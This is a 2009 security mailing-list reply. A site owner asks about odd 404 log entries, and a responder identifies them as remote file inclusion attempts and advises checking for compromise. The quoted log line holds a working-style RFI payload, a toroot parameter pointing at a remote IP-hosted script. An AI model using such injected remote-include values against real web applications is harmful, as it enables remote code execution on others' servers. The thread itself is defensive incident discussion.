Re: 404 messages pointing to a strange location

[Daniel Clemens <daniel.clemens () packetninjas net>]

On Jan 2, 2009, at 4:10 AM, Simon wrote:

> Hi all,
>
> Yesterday evening I had lots of 404-messages from my web server, all  
> pointing to locations like
> http://foo.bar/something//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt 
> ?
> I don't use paypal or anything similar on my page; what does that  
> mean?

Looks like a bug being exploited with file inclusion being rendered  
back to your server.
I would look for other signs of compromise on your system as well as  
what Tom Ritter posted.

| Daniel Uriah Clemens
| Packetninjas L.L.C | | http://www.packetninjas.net
| c. 205.567.6850      | | o. 866.267.8851
"The secret to creativity is knowing how to hide your sources" Einstein


-------------------------------------------------------------------------
Sponsored by: Watchfire 
Methodologies & Tools for Web Application Security Assessment 
With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today! 

https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
-------------------------------------------------------------------------